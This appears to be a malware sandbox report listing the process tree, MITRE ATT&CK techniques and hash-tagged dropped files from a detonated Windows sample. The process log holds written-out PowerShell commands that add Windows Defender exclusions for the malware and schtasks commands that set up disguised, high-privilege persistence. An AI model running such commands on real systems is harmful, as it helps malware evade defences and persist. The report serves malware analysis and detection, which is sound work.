- C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
  "C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
  2⤵
  PID:8128

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-15746454561168637836-1879871828-1934318429-63483566020160194057204518101127178097"
1⤵
PID:1920

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "181565198770428621091867651924704072674597771918110201-1801149945431554144"
1⤵
- Loads dropped DLL
PID:900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-377776966698010413-1541660903-1905702121-199210903414701797671690944494-1824815470"
1⤵
PID:2124

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
1⤵
PID:2304

C:\Windows\SysWOW64\sysadgi.exe
C:\Windows\SysWOW64\sysadgi.exe
1⤵
PID:4092

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4976

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
1⤵
PID:4732

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:3076
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 86E9DEBBF3F86EAD18A73832C0FAD017 C
  2⤵
  PID:8512

C:\Windows\system32\taskeng.exe
taskeng.exe {F58D61AB-B5B1-4E38-975E-9FD27F37A9D3} S-1-5-21-1846800975-3917212583-2893086201-1000:ZQABOPWE\Admin:Interactive:[1]
1⤵
PID:3840
- C:\Program Files\taskhostw.exe
  "C:\Program Files\taskhostw.exe"
  2⤵
  PID:4564
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Discord.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:8504
- C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe
  C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe
  2⤵
  PID:3936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:8592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RtkAudUService64.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:8488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7552
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AggregatorHost" /tr "C:\Users\Admin\AppData\Roaming\AggregatorHost"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1540
- C:\ProgramData\mddjpug\llxax.exe
  C:\ProgramData\mddjpug\llxax.exe start2
  2⤵
  PID:7584
- C:\Users\Admin\AppData\Local\Discord.exe
  C:\Users\Admin\AppData\Local\Discord.exe
  2⤵
  PID:6904
- C:\Users\Admin\AppData\Roaming\AggregatorHostsss
  C:\Users\Admin\AppData\Roaming\AggregatorHostsss
  2⤵
  PID:6988
- C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
  C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
  2⤵
  PID:6968
- C:\Users\Admin\AppData\Roaming\AggregatorHost
  C:\Users\Admin\AppData\Roaming\AggregatorHost
  2⤵
  PID:5156
- C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
  C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
  2⤵
  PID:9012
- C:\Users\Admin\AppData\Roaming\AggregatorHostsss
  C:\Users\Admin\AppData\Roaming\AggregatorHostsss
  2⤵
  PID:8036
- C:\Users\Admin\AppData\Local\Discord.exe
  C:\Users\Admin\AppData\Local\Discord.exe
  2⤵
  PID:6336

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2256

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:6880

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PROGRA~3\Hdlharas\mdkhm.zip

Filesize
56KB

MD5
b635f6f767e485c7e17833411d567712

SHA1
5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8

SHA256
6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e

SHA512
551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

Download Submit
C:\Program Files\taskhostw.exe

Filesize
226KB

MD5
9e02078809cf34479e5108fca383862c

SHA1
d82926214ea6cc5f1f162eb526a0a54a5b4068b3

SHA256
02ff75101c0d1cebbc3b45196cb87634af88447fbd7fca2ffe76a21f1d2be703

SHA512
52624e87e688ebadebb658f6a05db09c5543431b2bdd26141a13bdced80838638097781a0b89bd21b59aa14f64becf92663a93d76c7c7325d01fe70ddd6ec512

Download Submit
C:\ProgramData\Hdlharas\dlrarhsiva.exe

Filesize
9.1MB

MD5
64261d5f3b07671f15b7f10f2f78da3f

SHA1
d4f978177394024bb4d0e5b6b972a5f72f830181

SHA256
87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad

SHA512
3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

Download Submit
C:\ProgramData\JJECAAEHCFIEBGCBGHIE

Filesize
6KB

MD5
32ce6268442895cf89b605141169fdce

SHA1
f3d70635a73d9b5513cafd428e8cc10972048389

SHA256
e287f70336a614563f334e3d5c67a953ef2def6185e36a6b6b2215b9db24f726

SHA512
a6b9700e74f001a2e6fa629fec8d8d616e5563dce621a38a5740676dccf10f5e9367ce3ebc8274360df30de6bdd151a398ab91b407e9b1d8c04eb532ecf4be19

Download Submit
C:\ProgramData\a5410c88f1\bween.exe

Filesize
248KB

MD5
a7d7a53ac62cc85ecddf710da9243d64

SHA1
4bfee487fae3e4daf9eaaeea9c5e7469c4e94ec1

SHA256
d20d9c4ca508991a5a3482ff1545ba5f39c96892538f3a50b720259f446dfee3

SHA512
ae56373353977726a36a56c0e8f2c70c0750594a7390421e1358fbcffcdbb9554d404b607e54102360e2086ce0cbb0049215b29e61c3a0e2425e4b959e9efe8a

Download Submit
C:\ProgramData\mddjpug\llxax.exe

Filesize
88KB

MD5
168e78a7154b2453627f5ca82e9ccced

SHA1
2a1b4df3e681f1b401c1d704351817e4642b8692

SHA256
d311d65ddc8477c84bd77baa9606980515962231ea048e6c65d3d9b1bc527464

SHA512
11d48effa4cf685fd12836222fd0e09d5f7be96b077d0292521e6341f1287b95fa7db5f94b2528bd83f0d7eff1a6c8ccff7270e3cd1fad1625b6c9040394e346

Download Submit
C:\Users\Admin:.repos

Filesize
1.2MB

MD5
683fd308c8d6f91a1cd5766d82cb81b3

SHA1
29053b19a82c97633367c13b34d86b3361aac469

SHA256
7c8d35befaf8af9277d9a6406ad9fb500d8303899f1414efa08cbaeae96c02c5

SHA512
1d698214bb95b15205b91fa9469b96e26ba43de563651d220516c8707eb0729eae36730c91899224088f2fb47d2177e4627cc2ccf8947b64a0eea9ec8924516b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
71KB

MD5
83142242e97b8953c386f988aa694e4a

SHA1
833ed12fc15b356136dcdd27c61a50f59c5c7d50

SHA256
d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

SHA512
bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

Download Submit
C:\Users\Admin\AppData\Local\AdvinstAnalytics\67d743c3687d362f387c47f6\1.0.1\{6518D4BD-B1D6-43F4-A24E-CAA6ACD2E48F}.session

Filesize
21KB

MD5
8a87369f179ede539ff27b7ee89f9c52

SHA1
34c5e22a00b184b026187f6a66f32f48ec31d9e7

SHA256
570eb25bf2dfa26b5ffb7b42251232ab47defdf2117020b144f8ba40f884edfd

SHA512
2fb72a05311c4fcc7db660e1120d6715dd6583ee3d2ec5d2f14ba8a39c4a163f258d2080edaa94c2811f7502f78324a1b27eb969fe12789a01f1cbbed2678e54

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000009.dbtmp

Filesize
16B

MD5
979c29c2917bed63ccf520ece1d18cda

SHA1
65cd81cdce0be04c74222b54d0881d3fdfe4736c

SHA256
b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53

SHA512
e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000010.dbtmp

Filesize
16B

MD5
60e3f691077715586b918375dd23c6b0

SHA1
476d3eab15649c40c6aebfb6ac2366db50283d1b

SHA256
e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee

SHA512
d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Extension Scripts\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Site Characteristics Database\000004.dbtmp

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Site Characteristics Database\CURRENT~RFf789ede.TMP

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\System Profile\Sync Data\LevelDB\000002.dbtmp

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\01LB6K3J\service[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0I0VVMWQ\soft[1]

Filesize
3.0MB

MD5
fc1e4df340c9005e05b8bfc96cec9e09

SHA1
b443e9d3d0e35f97db505025d130ccb6646cd437

SHA256
0c68affa8190af92aac6b35099f3e67659c42f6bc854a7d764a3a448eff2cb51

SHA512
3a1cb04272ae35edbcae5211c02eca15735f63dfe0491158aee0565f226277810923b1f1cfca30dd594d926466628315454af466230f02d0b0f5d181fa3f2101

Download Submit
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

Filesize
8KB

MD5
69994ff2f00eeca9335ccd502198e05b

SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead

SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe

Filesize
300KB

MD5
0c5f210d9488d06c6e0143746cb46a4c

SHA1
8c10d61f4fb40acdd99d876c632a3388a9dfbad7

SHA256
0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0

SHA512
bb18b8e5e7c6b5e1cb9535c0910a7175f0871b21aab0238cfd3a5fd0a8e79790d457b0ed15b2c5695ba59595d5019975be8ae02eddf1d4c2381b9c1bf43920d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\0F77142C_Rar\LoveForyou.scr

Filesize
1.8MB

MD5
789183739b41d876a88e2091b75f0343

SHA1
a2ee6612c3a3eb56848ce9e204acb0d1fba63f6e

SHA256
de095132f160cdb9114dbec3e9fdebfa24277d3daf4adf03ca425022d1299605

SHA512
dd199bcdbde2ad421ae708e15696c7a1ce38e9cfaefa13254c1149d5de163fa346c129da08f8f90d01d57b8afb7578ff7ba0f9458466f4df4ae2c5a001e9d082

Download Submit
C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe

Filesize
182KB

MD5
64d8b413b2f5f3842e6126b398f62ab5

SHA1
f1c74de5ca76f0feb233ac7b5fb5e0158fb37d79

SHA256
0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d

SHA512
328235f69b4db694cfd0e826d0012bb4b9d1f2971a27eec9fd27b106e9a6201a619bdd6ff0cfdad7144ef20276c423bd800ddbc9b5c6cff3c0c37e79837a48cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe

Filesize
327KB

MD5
f0676528d1fc19da84c92fe256950bd7

SHA1
60064bc7b1f94c8a2ad24e31127e0b40aff40b30

SHA256
493b897d1a54e3aa3f177b49b2529d07cdd791c6d693b6be2f9a4f1144b74a32

SHA512
420af976406380e9d1f708f7fc01fc1b9f649f8b7ffaf6607e21c2e6a435880772b8cd7bbff6e76661ddb1fb0e63cba423a60d042d0bcf9aa79058cf2a9cb9d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe

Filesize
1.3MB

MD5
eb880b186be6092a0dc71d001c2a6c73

SHA1
c1c2e742becf358ace89e2472e70ccb96bf287a0

SHA256
e4e368cac17981db7fbd37b415ee530900179f1c73aa7fad0e169fcc022e8f00

SHA512
b6b9fad4e67df75c8eea8702d069cc1df0b8c5c3f1386bc369e09521cbf4e8e6b4c08102ceea5ca40509bf0593c6c21b54acf9b8c337bff6aa1f3afc69d0f96e

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337530101\6f415ff773.exe

Filesize
938KB

MD5
580324d3610900fdb2ff2901cc684dcf

SHA1
6fcc3e1c69ca7de61414e554a2b0a04379521a8f

SHA256
1ce23176c4cf97314d37e84f511a79291c86cda7e7a3f9074c7702c12be9e23c

SHA512
0f77bcf1f24cecfd119622c16095e978dc896190513c00f3b079acbabae87da21bd0a186da5b2fe6073e0ab58275e6a4a538b294ccc9dad1378861172ded35d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337540121\am_no.cmd

Filesize
1KB

MD5
cedac8d9ac1fbd8d4cfc76ebe20d37f9

SHA1
b0db8b540841091f32a91fd8b7abcd81d9632802

SHA256
5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b

SHA512
ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337610101\78bf86c114.exe

Filesize
4.5MB

MD5
a0b1081d358b13d5cde9599b3f27ea8a

SHA1
d9517dad41a96a6b7b3e588a9d54cea4870bbbbc

SHA256
e3c731d96c2980e9dfde2cbecd7990ddbabfbffceda33bb7f549351144f3bda6

SHA512
06afcfc3c97e8500baf7cfe45b761f4f2f1023f4b9569b130c7b554faaa36272a8b3b2edf45802bd3ee5fad25ed8bd2b21cd3140d31a3813c8318b047f3d9e16

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337620101\8bd304bd2c.exe

Filesize
4.4MB

MD5
99116c11d6d25eea78570c9bf70bcaf6

SHA1
9dab1eb2af23d8262bf73ad6b9a96675957fb0c0

SHA256
b7169a7f0ca94554c2fbc5daee887dc1fc2c9892b6154ecc89a84eb0726fa9ea

SHA512
24270cdb1063f9074497d230bc90663e558ba564ab3d155a59872c7628b8ccbedf76d90b5a4077035ed19e329bb1e56de1f3bb193569a656aa2be8b01b1c5e76

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337630101\6cea8eed50.exe

Filesize
1.1MB

MD5
96fa728730da64d7d6049c305c40232c

SHA1
3fd03c4f32e3f9dbcc617507a7a842afb668c4de

SHA256
28d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93

SHA512
c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337640101\4b4e90b6c4.exe

Filesize
1.2MB

MD5
a38b838486743b7473b4e993ef6f7895

SHA1
db8b711f84ea5610b1f3a00c83827c0226b372c9

SHA256
843b982f5fe42f642e0f7a3b1c10cddd1bc0e4072e31d6474aff430ef7977960

SHA512
f38b6fe2e2cda920904e553984298066b24411edaab4f8c7388f24bb590044e08967283910dbe063a56c784c26f7ef580f85d496880c5ed9cb98b4850e968da1

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337650101\bfdcd91edc.exe

Filesize
2.9MB

MD5
2cdb4554508d15cae8476de2ab840e12

SHA1
b012f730fbea610e319e8e8afb51299dfaeb650b

SHA256
1fd352ea58c0629472f65de13e74969858770dffa07784998fd0611007b6751d

SHA512
7a11105a5772c97e5a5edfc08d8861d073d2ee339116d74e8cac0ead3a53c22fac1c8c063cc4b468093cc5ac8190d5cc543fa068ab5ea43ee4f116a43dc0786a

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337660101\01fb647d7e.exe

Filesize
1.7MB

MD5
1dfecd13c3d1c21e4f33694f13df02fb

SHA1
6d9d48568847a8bcf9d7ed2e040cdf76cab1e578

SHA256
5f2f29405bb4332f6afaf99bb63b0657f42cea9a130f29f2fb0be769242c8990

SHA512
85b8a644b3c544829e8f665b2db121446c2962611972e1e502b4570b54a321f0d0e75cc2f0c84ef9062101c28ea79effdecbf3bce7c09a60cda81418af618fe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337670101\554ed4cbed.exe

Filesize
949KB

MD5
391ff5ff27bb770f0056adc11c040eb9

SHA1
7db794de34df45f973dffe037b396017cf0973a5

SHA256
f81997102b7615875fb4a076755887cf5c06c00645ced740d45478ad5868c8a5

SHA512
515951f54feb2221922c0f2c9cbb9c116277e4d3ebbca99832a6cab1fb144364c5347e6c9fc660cdf837ce3d20f628c60ccc6b94ba9a4d765fe7f666be798d28

Download Submit
C:\Users\Admin\AppData\Local\Temp\10337680101\809c765aad.exe

Filesize
1.7MB

MD5
d0f6451e7f010c28d5542743fc0de753

SHA1
6927dc54aaabd515ddcf8ae46899f0f5bf765025

SHA256
249ef3138dadcbb6b56dd4dfb29a2cc4e9731867d9a187c8249a6b45b32c0692

SHA512
bf9f788bc8aa9184e0a54a42ff5934b80f84b12d2819c50c97946c9c23bb0143ad79f24d97fe65e2eda942108a445e5ec49168471989126f2de7531dceef66b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\11.exe

Filesize
88KB

MD5
89ccc29850f1881f860e9fd846865cad

SHA1
d781641be093f1ea8e3a44de0e8bcc60f3da27d0

SHA256
4d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3

SHA512
0ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502

Download Submit
C:\Users\Admin\AppData\Local\Temp\2DB5.tmp\putty.bat

Filesize
40B

MD5
5dbff324b3bdba08cbb6ac18161d31fa

SHA1
1d7da87db0db52d3755a8bdf066fe2309b9c2860

SHA256
0ee0d0d9500088d39c2c67bc5d8f576ecdeab55361caeef53ddf03c33778e2f7

SHA512
3dc1cf30f3733cc6606eda962e8ef8b2ffb883367e97a22f02a1fe09f7ab8f53e6e0b03dc01f55a292e04895c744948e553f5931343777e8eb98eb4718b6fd4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\2f6LOb1AHb4E.bat

Filesize
207B

MD5
0ea1bc2839960c007fc424d239654506

SHA1
54c0dcb5a12ddbbed9464aec3d85ae1e53d62d57

SHA256
9e4794c1a0d7dabbe940147c84b56895bac4ad74aab6fc19cbc5661511d9778c

SHA512
2d69b1a27f1138fe18e44fbaf5a2414d1da2e72c76146dec780a4f4168f5513488bdcf4bfdeab389ed537a28c713b0ba723e0eaad248789f2451331eed67dace

Download Submit
C:\Users\Admin\AppData\Local\Temp\5bL3uM03lwMc.bat

Filesize
207B

MD5
6081a4f756b2091c28dc7a0f4a0fc60d

SHA1
a88ed1e5543183c55386691f55fcda1db245644c

SHA256
c4065d36fef3396d4722e4e190286eef37f59d958eb068924591a2f7b8885607

SHA512
3e567313c7193797c866c9ff9ce98eb978f27d964c2f8b3adbdac2b5422f9bcdbeb68258644105b5f0f6a89221ffddaf0823085ad59d832a1e21e1adea234e40

Download Submit
C:\Users\Admin\AppData\Local\Temp\AIE7541.tmp

Filesize
33.9MB

MD5
40b2c66899570421c53ea366aef5acf9

SHA1
feb7c8459961c9e812c0a04dce52633ead820764

SHA256
bf68660833d7514dd4d63ea43317a72511974985054e4d2f5838fd798cd9cf08

SHA512
f2446cbd8d707d0ad6491703539515770a15298bf9e536d69f87ffaf8665cd1b3f70bae6610f5cc19ae094c8959eb84bf5b037207e926a315e9aaee92fec43bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_5900\banner.jpg

Filesize
2KB

MD5
daf14d3480c7aa73a53415ff483b10a1

SHA1
db240a22410ac7536f5c833ca98322cca4180c3d

SHA256
0d2715e6689ea0cccc6cdfad328dab66f61df466fbbaf043cef2d05f9ad420c4

SHA512
7741a04025317179eaf14f7843f313f0e8922fd219c1d45db91e65e58229a1c948fb12120806507162d064b03dd4a45a8380210545a8a61910e622f0b3c736c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_5900\dialog.jpg

Filesize
36KB

MD5
abf1076064505dee794fa7aed67252b8

SHA1
358d4e501bb3007feece82a4039cc1050f23fab4

SHA256
fb0d133f05de6aa6a7a3491ae532191a60c438b35d9ff7bfec9e63131f6f0c73

SHA512
9a4680a8d186c1d7550b5e03cbdd095b0c88b2e0249a3af75fa0253d2c9a6f0aa1dd570ecf1a273683a14e6c7b5fb11678be3da439a3bf23eab790372e96e321

Download Submit
C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe

Filesize
194KB

MD5
1de4e189f9e847758c57a688553b4f8f

SHA1
1b1580955779135234e4eb3220857e5a8d5168ac

SHA256
c439e919ee06a37656784b922599febcc1d6e2f9a1d43b9ee053e0af345af557

SHA512
9641fd69a2189a26bbf97b725976e3435597bb6a9b90a1404428dc496bb12ef02b8685eea42167f4a340d9e4df622bfb2725e19723b7459856a96aa8a61cd864

Download Submit
C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe

Filesize
6.6MB

MD5
c108c1c76a3676b39aabbcf8aa9efb69

SHA1
f340b39f41adc4f47c81b990e5fd214043f1dfbc

SHA256
90b04fd7fe0d8ca43c6aa4affcf5c68a6f977ceeeaba8c0cbfcee4e8435ea460

SHA512
b7e9c67956e5be98adfa8d24fabed4a34972d878ccadba5d55d3e974ba86cf4438d1fc951b424e4575a5d41216b4b5437a73148c64987d32d9960fb2195642de

Download Submit
C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe

Filesize
104KB

MD5
eb6beba0181a014ac8c0ec040cb1121a

SHA1
52805384c7cd1b73944525c480792a3d0319b116

SHA256
f87b4e7c69ce161743f4b9b0001d7376e163d615ce477c390f63cadf09ffc5d4

SHA512
0afb9a7d180fe017520afb39e954821f77c8b6e2e11bbf73402dcdade231d07f3b755f40606252c917b51a0f5f32d499b96b30e7f2f617c50e709eae4cd80ae4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe

Filesize
444KB

MD5
0df064a92858ef4d9e5d034d4f23fa7b

SHA1
aed9a8905ddd7296eb394be451a4d72b7d5442b3

SHA256
d1afcd5386c713d7439d6fe2e8c2b2548b4b2c748a6873469daa33dc06c1da8f

SHA512
